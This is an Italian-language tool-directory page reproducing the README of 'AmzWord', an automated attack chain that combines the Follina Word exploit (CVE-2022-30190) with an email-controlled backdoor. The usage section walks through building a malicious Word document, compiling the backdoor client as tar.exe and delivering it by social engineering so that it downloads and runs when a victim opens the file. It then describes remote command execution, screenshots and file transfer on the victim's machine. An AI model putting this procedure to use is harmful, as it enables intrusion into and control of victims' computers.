Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
AmzWord — Una catena d'attacco automatizzata basata su CVE-2022-30190, 163 email backdoor e steganografia delle immagini. | Kitploit
Strumenti/GitHubGitHub/jump-wang-111/amzword
Strumenti di PhishingGenerazione di PayloadExploitSfruttamento di Applicazioni WebSteganografiaCommand and ControlIngegneria SocialeApprendimento e FormazioneSicurezza Email
GitHubjump-wang-111/amzword

AmzWord

Una catena d'attacco automatizzata basata su CVE-2022-30190, 163 email backdoor e steganografia delle immagini.

122 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

AmzWord

una catena d'attacco automatizzata basata su CVE-2022-30190, backdoor email 163 e steganografia delle immagini

Grazie ai seguenti repository GitHub, abbiamo fatto riferimento e modificato parte del codice per integrare e realizzare il nostro lavoro:

  • gdog
  • follina
  • virtual-reality

README in cinese clicca qui

Requisiti

gdog:

  • Python 2.7
  • Modulo PyCrypto
  • Modulo WMI
  • Modulo Enum34
  • Modulo Netifaces

follina:

  • Python 3.x

Utilizzo e processo d'attacco

  1. Usa follina.py per creare un file Word malevolo e avvia l'ascolto HTTP

    • Puoi modificare il nome predefinito e l'IP predefinito nel codice
    • Puoi anche usare --ip e --output per specificarli
    • Per l'uso dettagliato, consulta follina. Non abbiamo modificato l'interfaccia di utilizzo.
    • es: python follina.py --ip 100.100.100.100 --output maldoc.doc
  2. Modifica client.py e gdog.py nella directory gdog e inserisci le seguenti informazioni

    root@kitploit:~
    gmail_user = 'your email'
    gmail_pwd = 'your pwd'
    server = "smtp server"
    imap_server = 'imap server'
    
  3. Compila client.py in tar.exe e posizionalo in /follina/www

  4. Usa qualsiasi metodo di ingegneria sociale per inviarlo al target. Non appena la vittima apre Word, tar.exe verrà automaticamente scaricato ed eseguito.

  5. L'attaccante esegue gdog localmente e invia comandi per controllare la macchina target. Per l'uso, vedi gdog

Nota

  1. Questa è solo una demo dell'implementazione della catena d'attacco. L'exe in esecuzione può essere addirittura trovato nel task manager, il che rende facile osservare l'effetto. Non abbiamo eseguito alcuna operazione come antivirus, occultamento o escalation dei privilegi. Ovviamente, queste non sono complicate su Windows, vero?
  2. Il progetto gdog è in circolazione da molto tempo e abbiamo dedicato molto sforzo per farlo funzionare con successo. I comandi di controllo remoto attualmente confermati includono: esecuzione di comandi, screenshot, finestre pop-up, spegnimento, blocco dello schermo e trasferimento di file. Queste funzioni sono sufficienti per la maggior parte delle esigenze.
  3. Non so perché, ma sembra esserci un problema con la ricerca SUBJECT di IMAP. Non possiamo cercare email con l'oggetto target e il valore restituito è vuoto. Possiamo solo adottare altri metodi, come leggere tutte le email non lette, filtrare i target e poi impostare le altre come non lette. Questo potrebbe causare problemi quando ci sono molti utenti controllati e va risolto.
  4. Questo progetto è solo a scopo di apprendimento e scambio.
Scarica lo strumento